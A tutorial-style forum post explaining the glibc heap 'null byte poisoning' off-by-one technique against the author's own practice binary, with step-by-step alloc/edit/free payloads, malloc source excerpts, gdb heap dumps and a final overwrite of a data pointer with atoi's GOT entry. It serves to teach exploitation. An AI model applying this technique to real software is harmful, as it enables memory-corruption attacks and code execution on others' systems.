Null Byte Poisoning - The Magic Byte

Hello folks! I hope you’re all doing great! Today’s topic is by far my most favorite heap exploitation technique I’ve ever dealt with until now (as far as Linux is concerned). I can’t stress enough how much I love this technique. It’s super smart, technical, and even though malloc has been hardened a ton over the years, it still bypasses all mitigations. And the best part, one single byte overflow can cause chaos.

For today’s demo purposes, I’ve created a pwnable in order to practice/showcase the technique (I’ll demo the exploit on Ubuntu 16.04). I highly recommend going through some google research and my previous posts on heap exploitation if you’ve never pwned the heap before. At the end of the post you can find another pwnable of the same nature made by HITCON in case you want to master the technique. Without further ado, let’s get right into it!


Disclaimer: The following text is part of my own research / comprehension. If you’re a veteran on this topic and you happen to spot any mistake please let me know and I’ll correct it asap.


###Binary Recon

Before we jump into the theory of the null byte poison attack, let’s skim through the assembly real quick. The binary doesn’t do anything extroardinary.

  • We can allocate a chunk. The chunk has the following structure:
struct chunk {
     size_t size;
     char* data;
};
  • We can dump the chunk’s content.

  • We can free the chunk. No bugs there.

/* index */  
mov eax, dword [rbp-0x14]  
mov rax, qword [rax*8+array]
/* Free data's malloc'd pointer */  
mov rax, qword [rax+0x8]
mov rdi, rax
call free
mov eax, dword [rbp-0x14]
/* Free the chunk itself */
mov rax, qword [rax*8+0x6020c0]
mov rdi, rax
call free
mov eax, dword [rbp-0x14]
/* No UAF or double-free */ 
mov qword [rax*8+0x6020c0], 0x0
  • And finally we can edit the chunk’s content, that’s where the magic happens.
mov eax, dword [rbp-0x14]
mov rax, qword [rax*8+0x6020c0]
/* Get size of data */
mov rdx, qword [rax]
mov eax, dword [rbp-0x14]
mov rax, qword [rax*8+0x6020c0]
/* Get the data pointer */
mov rax, qword [rax+0x8]
mov rsi, rdx
mov rdi, rax
call 0x400b12

0x400b12:

	/* Null terminate at offset data + size */
	mov qword [rbp-0x8], rdi
	mov qword [rbp-0x10], rsi
	mov rdx, qword [rbp-0x8]
	mov rax, qword [rbp-0x10]
	add rax, rdx
	mov byte [rax], 0x0


Although this function might not look buggy to the unexperienced eye, it’s actually pretty lethal. Consider the following example:

alloc(0x88,  'A'*0x88)
alloc(0x108, 'B'*0x108)
0x603000:	0x0000000000000000	0x0000000000000021 <-- chunk 0
0x603010:	0x0000000000000088	0x0000000000603030 <-- data pointer
0x603020:	0x0000000000000000	0x0000000000000091
0x603030:	0x4141414141414141	0x4141414141414141
					...					...
0x6030a0:	0x4141414141414141	0x4141414141414141
0x6030b0:	0x4141414141414141	0x0000000000000021 <-- chunk 1
0x6030c0:	0x0000000000000108	0x00000000006030e0 <-- data pointer
0x6030d0:	0x0000000000000000	0x0000000000000111
0x6030e0:	0x4242424242424242	0x4242424242424242
0x6030f0:	0x4242424242424242	0x4242424242424242
					...					...

If we call edit on chunk 0, it will take data’s address (0x603030) and null terminate its content at offset:

0x603030 + 0x88 = 0x6030b8 = chunk 1's size field.
edit(0, 'A'*2)
0x603000:	0x0000000000000000	0x0000000000000021 <-- chunk 0
0x603010:	0x0000000000000088	0x0000000000603030 <-- data pointer
0x603020:	0x0000000000000000	0x0000000000000091
0x603030:	0x4141414141414141	0x4141414141414141
					...					...
0x6030a0:	0x4141414141414141	0x4141414141414141
0x6030b0:	0x4141414141414141	0x0000000000000000 <-- chunk 1
0x6030c0:	0x0000000000000108	0x00000000006030e0 <-- data pointer
0x6030d0:	0x0000000000000000	0x0000000000000111
0x6030e0:	0x4242424242424242	0x4242424242424242
0x6030f0:	0x4242424242424242	0x4242424242424242
					...					...

Booyah, corruption! Chunk 1’s size went from 0x21 to 0x00. The binary recon is over, let’s move on to the pwning part.


###Leaking Libc

The heap has the above structure. There are two ways to leak libc. The boring way and the 1337 way. I’ll illustrate both because why not. Free-ing chunk 0 has the following effect.

free(0)
0x603000:	0x0000000000000000	0x0000000000000021 <-- chunk 0
0x603010:	0x0000000000000000	0x0000000000603030
0x603020:	0x0000000000000000	0x0000000000000091
0x603030:	0x00007ffff7dd37b8	0x00007ffff7dd37b8

Because of the fact that the data’s heap chunk is of size 0x90, it’s considered a small bin chunk. Meaning, it will be placed in a circly double-linked list. Actually, it’ll first be placed in the unsorted bin list since malloc likes to give the recently free’d chunk one chance of re-allocation before it places it in the corresponding small bin list for speed purposes.

/*
    Place the chunk in unsorted chunk list. Chunks are
    not placed into regular bins until after they have
    been given one chance to be used in malloc.
 */

    bck = unsorted_chunks(av);
    fwd = bck->fd;
    if (__glibc_unlikely (fwd->bk != bck))
        malloc_printerr ("free(): corrupted unsorted chunks");
    p->fd = fwd;
    p->bk = bck;
    if (!in_smallbin_range(size))
    {
        p->fd_nextsize = NULL;
        p->bk_nextsize = NULL;
    }
    bck->fd = p;
    fwd->bk = p;

    set_head(p, size | PREV_INUSE);
    set_foot(p, size);

    check_free_chunk(av, p);

The BK and FD pointers you see in the data’s chunk are main arena pointers in libc. They have the same value because the free’d chunk is the only chunk in the circly double-linked list so both its BK and FD fields will point to the same bin address. The main arena’s state is the follwing:

==================  Main Arena  ==================
(0x20)     fastbin[0]: 0x603000 --> 0x0
(0x30)     fastbin[1]: 0x0
(0x40)     fastbin[2]: 0x0
(0x50)     fastbin[3]: 0x0
(0x60)     fastbin[4]: 0x0
(0x70)     fastbin[5]: 0x0
(0x80)     fastbin[6]: 0x0
                  top: 0x6031e0 (size : 0x20e20) 
       last_remainder: 0x0 (size : 0x0) 
            unsortbin: 0x603020 (size : 0x90)

Having read malloc’s source code, we should expect our data to be stored in the unsorted bin chunk at 0x603020 once we request a new allocation again. Why?


Our data’s size is 0x8 bytes long, meaning it’s of fast chunk size. However, because of the fact that the first allocation stores the size of the data and the pointer to the data (0x20 bytes in total including metadata), 0x603000 will be returned for the first allocation. Now we’re left with the unsorted bin chunk and no fastbin available to store our 8 byte long data. When there’s no fastbin available, the chunk will be served through smallbin code, and if there’s no smallbin available (there is none in our case), the chunk will be served through unsorted bin code (0x603020 in our case) or via the remainder. Let’s see it in action.

# Could've leaked libc but let's step it up
alloc(0x8, 'C'*0x8) 
0x603000:	0x0000000000000000	0x0000000000000021 <-- new chunk
0x603010:	0x0000000000000008	0x0000000000603030
0x603020:	0x0000000000000000	0x0000000000000021 <-- new data pointer
0x603030:	0x4343434343434343	0x00007ffff7dd3838
0x603040:	0x4141414141414141	0x0000000000000071 <-- remainder chunk after the split
0x603050:	0x00007ffff7dd37b8	0x00007ffff7dd37b8

We allocated just enough bytes to not overwrite the libc pointer. As you might noticed the BK field got updated to 0x00007ffff7dd3838. Why this happened is for you to figure it out, I can’t spoon feed you everything :wink:

Now if we go ahead and dump the chunk’s content, we’ll get the libc address (obviously in every execution the address will be a bit different but its offset from the base address always remains the same, check it out by yourself) back and we’ll be able to calculate libc’s base address. That’s boring. Let’s abuse the null byte overflow in order to leak and then execute arbitrary code.


###The Whys & Hows

There are many cases of a null byte poison. In a heap context though, null byte poisoning, aka off-by-one overflow, aka null byte overflow, aka chunk shrinking, is usually the ability to overflow a chunk’s size field while it’s free, leading to all kinds of pleasant mysteries.

The hows and whys of the mysteries will be presented by showing you the core pieces of malloc’s source code which the exploit/technique takes advantage of in order to achieve arbitrary code execution. Don’t worry if some of the code snippets make no sense in the beginning. When I’ll introduce the technique I’ll explain everything ranging from macros all the way up to the pointer arithmetic being used.


The scenario which I’ll try to achieve with this technique is to overlap a new allocated chunk with an already in use chunk (you’ll see what I mean) in order to overwrite the data pointer of the latter. There might be other ways to achieve arbitrary code execution by abusing this bug but the core effects should be the same.

Let’s first allocate a couple more chunks in order to make the technique work. Since the heap is quite complicated, what I like to do before any malloc/free is “guess” where the chunks will be placed in memory in order to test my understanding. So let’s make some assumptions together.

# p64(0x200) is needed afterwards in order to bypass one of unlink's checks
alloc(0x208, 'D'*0x1f0 + p64(0x200)) 

Ignore the content of the data for now, I’ll explain all about it later on. The state of main arena is this:

==================  Main Arena  ==================
(0x20)     fastbin[0]: 0x0
(0x30)     fastbin[1]: 0x0
(0x40)     fastbin[2]: 0x0
(0x50)     fastbin[3]: 0x0
(0x60)     fastbin[4]: 0x0
(0x70)     fastbin[5]: 0x0
(0x80)     fastbin[6]: 0x0
                  top: 0x6031e0 (size : 0x20e20) 
       last_remainder: 0x603040 (size : 0x70) 
            unsortbin: 0x603040 (size : 0x70)

The remainder chunk is of size 0x70. What does that mean for our allocation? As explained before, for every allocation we need 0x20 bytes in total (taking the heap metadata into consideration) in order to store the size of the data and the pointer. 0x20 is obviously less than 0x70 so the remainder chunk will get split, afterwards reattached and finally its size should now become 0x50.

size = chunksize (victim);

/*
   If a small request, try to use last remainder if it is the
   only chunk in unsorted bin.  This helps promote locality for
   runs of consecutive small requests. This is the only
   exception to best-fit, and applies only when there is
   no exact fit for a small chunk.
 */

if (in_smallbin_range (nb) &&
    bck == unsorted_chunks (av) &&
    victim == av->last_remainder &&
    (unsigned long) (size) > (unsigned long) (nb + MINSIZE))
{
   				...
 	/* split and reattach remainder */
   	remainder_size = size - nb;
   	remainder = chunk_at_offset (victim, nb);
   	unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
    av->last_remainder = remainder;

        		...
    set_head (victim, nb | PREV_INUSE |
                        (av != &main_arena ? NON_MAIN_ARENA : 0));
    set_head (remainder, remainder_size | PREV_INUSE);
    set_foot (remainder, remainder_size);

    check_malloced_chunk (av, victim, nb);
    void *p = chunk2mem (victim);
    alloc_perturb (p, bytes);
    return p;
 }        
   	             

As for our data, there’s no available free chunk to be served back to us and thus malloc will use its last resort, the top chunk.

victim = av->top;
size = chunksize (victim);

if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
{
    remainder_size = size - nb;
    remainder = chunk_at_offset (victim, nb);
    av->top = remainder;
    set_head (victim, nb | PREV_INUSE |
               (av != &main_arena ? NON_MAIN_ARENA : 0));
    set_head (remainder, remainder_size | PREV_INUSE);

    check_malloced_chunk (av, victim, nb);
    void *p = chunk2mem (victim);
    alloc_perturb (p, bytes);
    return p;
}

Let’s check the effect of our allocation on main arena.

==================  Main Arena  ==================
(0x20)     fastbin[0]: 0x0
(0x30)     fastbin[1]: 0x0
(0x40)     fastbin[2]: 0x0
(0x50)     fastbin[3]: 0x0
(0x60)     fastbin[4]: 0x0
(0x70)     fastbin[5]: 0x0
(0x80)     fastbin[6]: 0x0
                  top: 0x6033f0 (size : 0x20c10) 
       last_remainder: 0x603060 (size : 0x50) 
            unsortbin: 0x0
(0x050)  smallbin[ 3]: 0x603060

Look at that! The unsorted chunk was well placed in its corresponding small bin list, the last remainder moved further away and its size indeed became 0x50 and finally the top chunk also moved further away with its size reduced by 0x210 bytes as expected. Here’s the gdb view:

0x603000:	0x0000000000000000	0x0000000000000021
0x603010:	0x0000000000000008	0x0000000000603030
0x603020:	0x0000000000000000	0x0000000000000021
0x603030:	0x4343434343434343	0x00007ffff7dd3838
0x603040:	0x4141414141414141	0x0000000000000021 <-- new allocated chunk
0x603050:	0x0000000000000208	0x00000000006031f0 <-- new allocated pointer
0x603060:	0x4141414141414141	0x0000000000000051 <-- reattached remainder chunk
0x603070:	0x00007ffff7dd37f8	0x00007ffff7dd37f8
0x603080:	0x4141414141414141	0x4141414141414141
0x603090:	0x4141414141414141	0x4141414141414141
0x6030a0:	0x4141414141414141	0x4141414141414141
0x6030b0:	0x0000000000000050	0x0000000000000020
0x6030c0:	0x0000000000000108	0x00000000006030e0
0x6030d0:	0x0000000000000000	0x0000000000000111
0x6030e0:	0x4242424242424242	0x4242424242424242
0x6030f0:	0x4242424242424242	0x4242424242424242
0x603100:	0x4242424242424242	0x4242424242424242
0x603110:	0x4242424242424242	0x4242424242424242
0x603120:	0x4242424242424242	0x4242424242424242
					...					...
0x6031d0:	0x4242424242424242	0x4242424242424242
0x6031e0:	0x4242424242424242	0x0000000000000211 <-- new allocated data chunk
0x6031f0:	0x4444444444444444	0x4444444444444444
					...					...
0x6033c0:	0x4444444444444444	0x4444444444444444
0x6033d0:	0x4444444444444444	0x4444444444444444
0x6033e0:	0x0000000000000200	0x000000000000000a
0x6033f0:	0x0000000000000000	0x0000000000020c11 <-- new top chunk
					...					...

Let’s follow up with the next two allocations which will make malloc take the same code path like last time.

alloc(0x108, 'E'*0x108) 
# Prevent top chunk consolidation
alloc(0x108, 'F'*0x108)
0x603000:	0x0000000000000000	0x0000000000000021
0x603010:	0x0000000000000008	0x0000000000603030
0x603020:	0x0000000000000000	0x0000000000000021
0x603030:	0x4343434343434343	0x00007ffff7dd3838
0x603040:	0x4141414141414141	0x0000000000000021
0x603050:	0x0000000000000208	0x00000000006031f0
0x603060:	0x4141414141414141	0x0000000000000021
0x603070:	0x0000000000000108	0x0000000000603400
0x603080:	0x4141414141414141	0x0000000000000031
0x603090:	0x0000000000000108	0x0000000000603510
0x6030a0:	0x4141414141414141	0x4141414141414141
0x6030b0:	0x0000000000000030	0x0000000000000021
0x6030c0:	0x0000000000000108	0x00000000006030e0
0x6030d0:	0x0000000000000000	0x0000000000000111
0x6030e0:	0x4242424242424242	0x4242424242424242
0x6030f0:	0x4242424242424242	0x4242424242424242
0x603100:	0x4242424242424242	0x4242424242424242
					...					...
0x6031c0:	0x4242424242424242	0x4242424242424242
0x6031d0:	0x4242424242424242	0x4242424242424242
0x6031e0:	0x4242424242424242	0x0000000000000211 <-- chunk x
0x6031f0:	0x4444444444444444	0x4444444444444444
0x603200:	0x4444444444444444	0x4444444444444444
0x603210:	0x4444444444444444	0x4444444444444444
					...					...
0x6033a0:	0x4444444444444444	0x4444444444444444
0x6033b0:	0x4444444444444444	0x4444444444444444
0x6033c0:	0x4444444444444444	0x4444444444444444
0x6033d0:	0x4444444444444444	0x4444444444444444
0x6033e0:	0x0000000000000200	0x000000000000000a
0x6033f0:	0x0000000000000000	0x0000000000000111 <-- chunk y
0x603400:	0x4545454545454545	0x4545454545454545
0x603410:	0x4545454545454545	0x4545454545454545
0x603420:	0x4545454545454545	0x4545454545454545
					...					...
0x6034d0:	0x4545454545454545	0x4545454545454545
0x6034e0:	0x4545454545454545	0x4545454545454545
0x6034f0:	0x4545454545454545	0x4545454545454545
0x603500:	0x4545454545454545	0x0000000000000111
0x603510:	0x4646464646464646	0x4646464646464646
0x603520:	0x4646464646464646	0x4646464646464646
0x603530:	0x4646464646464646	0x4646464646464646
					...					...
0x6035f0:	0x4646464646464646	0x4646464646464646
0x603600:	0x4646464646464646	0x4646464646464646
0x603610:	0x4646464646464646	0x00000000000209f1 <-- updated top chunk

Our setup is ready, time to step up our game.


###Previous Size Field

In case you didn’t know, when a chunk is free’d and is of size greater than the maximum size value of a fast chunk, the chunk that is bordering the free chunk needs to update itself about the fact that the chunk next to it (technically before) got free’d and it does that by setting the IN_USE bit to 0 and the prevsize field to the size of the free’d chunk. Let me show you what I mean.

free(2) # chunk x
0x6031e0:	0x4242424242424242	0x0000000000000211 <-- chunk x [free]
0x6031f0:	0x00007ffff7dd37b8	0x00007ffff7dd37b8
0x603200:	0x4444444444444444	0x4444444444444444
0x603210:	0x4444444444444444	0x4444444444444444
					...					...
0x6033c0:	0x4444444444444444	0x4444444444444444
0x6033d0:	0x4444444444444444	0x4444444444444444
0x6033e0:	0x0000000000000200	0x000000000000000a
0x6033f0:	0x0000000000000210	0x0000000000000110 <-- chunk y 
0x603400:	0x4545454545454545	0x4545454545454545

As you can see, chunk y’s size field went from 0x111 to 0x110 to indicate that the previous chunk is free. Moreover, its prevsize field got updated from 0x00 to 0x210. The prevsize field is used only if the previous chunk is free, otherwise it’s part of chunk x’s data. Do the math and see that 0x6033f0 (the address of chunk y) - 0x210 equals to 0x6031e0.

Before I overwrite chunk’s size with a null byte (making it 0x200), I believe it’d be nice to have both POVs in mind, the one with non-overwritten size field and the one with the shrunk one. Firstly I will allocate a new chunk by leaving chunk x’s size untouched.

alloc(0x108,  'G'*0x108)

Malloc will take the following code path:

size = chunksize (victim);

/* We know the first chunk in this bin is big enough to use. */
assert ((unsigned long) (size) >= (unsigned long) (nb));

remainder_size = size - nb;

/* unlink */
unlink (av, victim, bck, fwd);

		...

remainder = chunk_at_offset (victim, nb);

/* We cannot assume the unsorted list is empty and therefore
   have to perform a complete insert here. */
   
bck = unsorted_chunks (av);
fwd = bck->fd;
if (__glibc_unlikely (fwd->bk != bck))
	malloc_printerr ("malloc(): corrupted unsorted chunks 2");
remainder->bk = bck;
remainder->fd = fwd;
bck->fd = remainder;
fwd->bk = remainder;

/* advertise as last remainder */
if (in_smallbin_range (nb))
    av->last_remainder = remainder;
        
    	...

set_head (victim, nb | PREV_INUSE |
              (av != &main_arena ? NON_MAIN_ARENA : 0));
set_head (remainder, remainder_size | PREV_INUSE);
set_foot (remainder, remainder_size);

check_malloced_chunk (av, victim, nb);
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p; 

It may look daunting at first but thankfully malloc’s authors knew how to write readable code and once you stare at it for a while it hits you. To sum up, here’s what will happen:

  • Calculate the remainder size after the split by subtracting the current size with the requested size (0x210 - 0x110 in our case).

  • Calculate the address of the remainder chunk after the split by adding the requested size + alignment to the base address of the chunk that is about to be allocated (0x6031e0 + 0x110 in our case).

  • Unlink the unsorted chunk from the bin list in order to split it.

  • Declare it as the remainder chunk (av->last_remainder = remainder).

  • Update the remainder’s size field with the set_head macro.

/* Set size/use field */
#define set_head(p, s)  ((p)->mchunk_size = (s))
  • Update the prevsize field of chunk y.
/* Set size at footer (only when chunk is not in use) */
#define set_foot(p, s)	(((mchunkptr) ((char *) (p) + (s)))->mchunk_prev_size = (s))
  • Give back the split chunk to the user.

This is how it looks like in memory:

0x6031e0:	0x4242424242424242	0x0000000000000111 <-- new allocated chunk z
0x6031f0:	0x4747474747474747	0x4747474747474747
0x603200:	0x4747474747474747	0x4747474747474747
					...					...
0x6032d0:	0x4747474747474747	0x4747474747474747
0x6032e0:	0x4747474747474747	0x4747474747474747
0x6032f0:	0x4747474747474747	0x0000000000000101 <-- remainder chunk after split [free]
0x603300:	0x00007ffff7dd37b8	0x00007ffff7dd37b8
0x603310:	0x4444444444444444	0x4444444444444444
0x603320:	0x4444444444444444	0x4444444444444444
					...					...
0x6033c0:	0x4444444444444444	0x4444444444444444
0x6033d0:	0x4444444444444444	0x4444444444444444
0x6033e0:	0x0000000000000200	0x000000000000000a
0x6033f0:	0x0000000000000100	0x0000000000000110 <-- chunk y 
0x603400:	0x4545454545454545	0x4545454545454545

Just to be sure, let’s check malloc’s calculations.


(i)   remainder_size = size - nb = 0x210 - 0x110        = 0x100
(ii)  remainder      = chunk_at_offset (victim, nb)     = 0x6031e0   + 0x110  = 0x6032f0
(iii) set_head (remainder, remainder_size | PREV_INUSE) = *(0x6032f0 + 0x8)   = 0x101
(iv)  set_foot (remainder, remainder_size);             = *(0x6032f0 + 0x100) = 0x100

Cute! Let’s have a look at what’s going to happen when the null byte poison takes place before the allocation.


###Null Byte Poisoning

We’ll take advantage of the fact that edit null terminates the provided strings as we saw during the recon phase.

# Null byte poison
edit(1, 'B'*0x108)
0x6030d0:	0x0000000000000000	0x0000000000000111
0x6030e0:	0x4242424242424242	0x4242424242424242
0x6030f0:	0x4242424242424242	0x4242424242424242
					...					...
0x6031d0:	0x4242424242424242	0x4242424242424242
0x6031e0:	0x4242424242424242	0x0000000000000200 <-- chunk x [shrunk & free]
0x6031f0:	0x00007ffff7dd37b8	0x00007ffff7dd37b8

Before we re-check malloc’s calculations once again for the new shrunk size, let me explain a bit about the below line of code which was previous used in the exploit:

# p64(0x200) is needed in order to bypass unlink's check
alloc(0x208, 'D'*0x1f0 + p64(0x200))

As I mentioned above, the next allocation will unlink the chunk at address 0x6031e0. Unlink’s code has the following checks that we need to bypass:

/* Take a chunk off a bin list */
#define unlink(AV, P, BK, FD) {                                            
    if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))      
      malloc_printerr ("corrupted size vs. prev_size");			      
    FD = P->fd;								      
    BK = P->bk;								      
    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))		      
      malloc_printerr ("corrupted double-linked list");	

In particular, we only need to bypass the first check since the second one is good to go because its FD and BK fields indeed point to it. Practically, the first check makes sure that:

sizeof(chunk) == *(0x6031e0 + size) == prev_size(next_chunk)

In other words, the prevsize field of the next chunk must have the size value of its previous free chunk as we discussed before. Since we overwrote the size with 0x200, the address area at offset 0x6031e0 + 0x200 still belongs to the data area of chunk x, 0x6033e0 to be precise.

Meaning, if we don’t take care of that value at that offset, unlink will detect the memory corruption and terminate the binary. That’s why my data’s payload has that certain structure, we technically craft a fake chunk.

Let’s move on with the allocation.

alloc(0x108,  'G'*0x108)
0x6031e0:	0x4242424242424242	0x0000000000000111 <-- new allocated chunk z
0x6031f0:	0x4747474747474747	0x4747474747474747
0x603200:	0x4747474747474747	0x4747474747474747
					...					...
0x6032d0:	0x4747474747474747	0x4747474747474747
0x6032e0:	0x4747474747474747	0x4747474747474747
0x6032f0:	0x4747474747474747	0x00000000000000f1 <-- remainder chunk after split [free]
0x603300:	0x00007ffff7dd37b8	0x00007ffff7dd37b8
0x603310:	0x4444444444444444	0x4444444444444444
					...					...
0x6033d0:	0x4444444444444444	0x4444444444444444
0x6033e0:	0x00000000000000f0	0x000000000000000a
0x6033f0:	0x0000000000000210	0x0000000000000110 <-- chunk y [prev_size not updated]
0x603400:	0x4545454545454545	0x4545454545454545
0x603410:	0x4545454545454545	0x4545454545454545

What the hell just happened?! Chunk y’s prevsize didn’t get updated and the remainder chunk’s size is 0x10 less than it was without the null poison. It’s no coincidence that chunk y’s “prev_size” field is 0x10 bytes before chunk y’s legit prevsize address. Off to the malloc calculations!


(i)   remainder_size = size - nb = 0x200 - 0x110        = 0xf0
(ii)  remainder      = chunk_at_offset (victim, nb)     = 0x6031e0   + 0x110  = 0x6032f0
(iii) set_head (remainder, remainder_size | PREV_INUSE) = *(0x6032f0 + 0x8)   = 0x101
(iv)  set_foot (remainder, remainder_size);             = *(0x6032f0 + 0xf0)  = 0xf0

Do you see what I see? The set_foot macro failed to update chunk y’s prevsize field (because 0x6032f0 + 0xf0 = 0x6033e0), which is a major advantage for us. Why’s that? Chunk y thinks that the previous free chunk is still 0x210 bytes before it, not knowing that in fact the free chunk has been updated, split and moved to a different address.

How can we take advantage of this? Well, the main goal is to be able to overwrite a data pointer so that once edit is called on that pointer, instead of editing data on the heap, we can edit whatever address we placed there (as long as it’s writable ofcourse). The Global Offset Table is writeable so that’s the address of choice (atoi’s GOT entry to be precise).

Let’s keep stepping through the exploit and witness the magic.

# Because there's no pointer in between chunk z and y
# we need to allocate one more chunk such that once we
# free chunk y, the next allocation will overlap with the
# previously allocated chunk.
alloc(0x80,  'H'*0x80)
0x6031e0:	0x4242424242424242	0x0000000000000111 <-- new allocated chunk z < - - - - - - - - - +					
0x6031f0:	0x4747474747474747	0x4747474747474747												 |
0x603200:	0x4747474747474747	0x4747474747474747												 |
					...					...														 |
0x6032f0:	0x4747474747474747	0x0000000000000021 <-- new allocated chunk w 					 |
0x603300:	0x0000000000000080	0x0000000000603320 <-- new allocated data pointer	     	     |
0x603310:	0x4444444444444444	0x0000000000000091												 |
0x603320:	0x4848484848484848	0x4848484848484848    											 |
0x603330:	0x4848484848484848	0x4848484848484848											     |
					...					...														 |
0x603390:	0x4848484848484848	0x4848484848484848												 | - 0x210 
0x6033a0:	0x4444444444444444	0x0000000000000041 <-- remainder chunk after next split			 |
0x6033b0:	0x00007ffff7dd37b8	0x00007ffff7dd37b8												 |
0x6033c0:	0x4444444444444444	0x4444444444444444												 |
0x6033d0:	0x4444444444444444	0x4444444444444444												 |
0x6033e0:	0x0000000000000040	0x000000000000000a												 |
0x6033f0:	0x0000000000000210	0x0000000000000110 <-- chunk y [thinks chunk z is free] - - - - -
0x603400:	0x4545454545454545	0x4545454545454545

Once again what was “supposed” to be chunk y’s prevsize field at address 0x6033e0 got updated to 0x40 (0xf0 - (0x90 + 0x20)) == 0x40). We have successfully placed a heap pointer between chunk y and chunk z. If you’ve been paying attention up until now you might be able to figure out the next two crucial steps. First, let’s free chunk z.

0x6031e0:	0x4242424242424242	0x0000000000000111 <-- new allocated chunk z [free] < - - - - - -					
0x6031f0:	0x00000000006033a0	0x00007ffff7dd37b8												 |
0x603200:	0x4747474747474747	0x4747474747474747												 |
					...					...														 |
0x6032f0:	0x0000000000000110	0x0000000000000020 <-- chunk w [size / prev_size updated]		 |
0x603300:	0x0000000000000080	0x0000000000603320 <-- pointer to overwrite					     |
0x603310:	0x4444444444444444	0x0000000000000091												 |
					...					...														 |
0x603390:	0x4848484848484848	0x4848484848484848												 | - 0x210 
0x6033a0:	0x4444444444444444	0x0000000000000041 <-- remainder chunk 		                     |
0x6033b0:	0x00007ffff7dd37b8	0x00007ffff7dd37b8												 |
0x6033c0:	0x4444444444444444	0x4444444444444444												 |
0x6033d0:	0x4444444444444444	0x4444444444444444												 |
0x6033e0:	0x0000000000000040	0x000000000000000a												 |
0x6033f0:	0x0000000000000210	0x0000000000000110 <-- chunk y  - - - - - - - - - - - - - - - - -                     
0x603400:	0x4545454545454545	0x4545454545454545

Now what will malloc do once I free chunk y?

/* consolidate backward */
if (!prev_inuse(p)) {
   prevsize = prev_size (p);
   size += prevsize;
   p = chunk_at_offset(p, -((long) prevsize));
   unlink(av, p, bck, fwd);
}

Simply put, malloc doesn’t like fragmentation (except for the case of fastbins), it likes keeping thing clean and tidy. For that reason, when a small chunk is about to free’d, it will check if its previous or next chunk are already free and if they are, it will consolidate them. Let’s see it happening in action.

# unlink chunk y and z
free(3)
0x6031e0:	0x4242424242424242	0x0000000000000321 <-- consolidated chunk  - - - +   
0x6031f0:	0x00000000006033a0	0x00007ffff7dd37b8								 |
0x603200:	0x4747474747474747	0x4747474747474747								 |
0x603210:	0x4747474747474747	0x4747474747474747								 |
0x603220:	0x4747474747474747	0x4747474747474747								 | + 0x110
							...													 |
0x6032e0:	0x4747474747474747	0x4747474747474747								 |
0x6032f0:	0x0000000000000110	0x0000000000000020 <-- chunk w still in use < - - 
0x603300:	0x0000000000000080	0x0000000000603320 <-- pointer in use
0x603310:	0x4444444444444444	0x0000000000000091
0x603320:	0x4848484848484848	0x4848484848484848
	

Voila! Chunk z and chunk y are now one entity and an allocation less than 0x321 in size and greater than 0x110 will be able to overwrite the pointer at address 0x603308. Let’s inspect main arena’s state.

==================  Main Arena  ==================
(0x20)     fastbin[0]: 0x603060 --> 0x603040 --> 0x0
(0x30)     fastbin[1]: 0x0
(0x40)     fastbin[2]: 0x0
(0x50)     fastbin[3]: 0x0
(0x60)     fastbin[4]: 0x0
(0x70)     fastbin[5]: 0x0
(0x80)     fastbin[6]: 0x0
                  top: 0x603610 (size : 0x209f0) 
       last_remainder: 0x6033a0 (size : 0x40) 
            unsortbin: 0x6031e0 (size : 0x320) <--> 0x6033a0 (overlap chunk with 0x6031e0(freed) )

Looking good. Ask yourselves, which code path will malloc take in case of an allocation of size 0x140? Let’s make our assumptions:

  • When deleting fastbins from bin lists, it’s done via the head of the list. Meaning, 0x603060 should be given back to us to place the size of the data and the pointer to it.

  • As for the data of size 0x140, because of the fact that 0x6031e0 is of small bin size, it’ll be placed in the unsorted bin list just in case the user requests a size less or equal to its size. We should expect 0x6031e0 to be served back to us in order to store our data. I’ll let you do the malloc calculations for the place where the remainder chunk will end up at.

# The new consolidated free chunk is placed in the unsorted bin.
# Further allocations will split that chunk as long as the request size is <= 0x321.
alloc(0x140, 'Z'*0x110 + p64(8) + p64(atoi_got))

0x6031e0:	0x4242424242424242	0x0000000000000151 <-- new chunk overlaps with chunk w
0x6031f0:	0x5a5a5a5a5a5a5a5a	0x5a5a5a5a5a5a5a5a
0x603200:	0x5a5a5a5a5a5a5a5a	0x5a5a5a5a5a5a5a5a
0x603210:	0x5a5a5a5a5a5a5a5a	0x5a5a5a5a5a5a5a5a
					...					...
0x6032f0:	0x5a5a5a5a5a5a5a5a	0x5a5a5a5a5a5a5a5a <-- chunk w is overwritten
0x603300:	0x0000000000000008	0x0000000000602058 <-- atoi's GOT entry
	

###Conclusion

The rest is history, I’ll let you figure out what’s next, it’s a piece of cake at this point. That’s been it folks. If you reached up to this sentence you’re a true champ and I’d like to thank you for taking the time to read my post. I hope you learnt something new and if you have any questions feel free to ask them down below or hit me up on IRC/twitter.


###References

(1) how2heap
(2) HITCON Lab

~ Peace out

18 Likes

Thank you for great tutorial :slight_smile:
I didn’t know well about heap Null poison attack . thanks to you I feel like I’m getting know about it :blush:
Thank you again, _py~

1 Like

How much time you take to upload this information here ur awesome bro but I can’t understand any thing as I am beginner but it looks super cool what u did

1 Like

Thank you for the feedback!

That depends entirely on how “heavy” the topic I’m trying to share is. This particular concept for instance is by far the most technical write-up I’ve written so far. I’d say it took me about 2-3 weeks of continuous research/reading and then about 4-5 days to create a pwnable, write a PoC and simplify the technique to make it a bit easier to digest.

3 Likes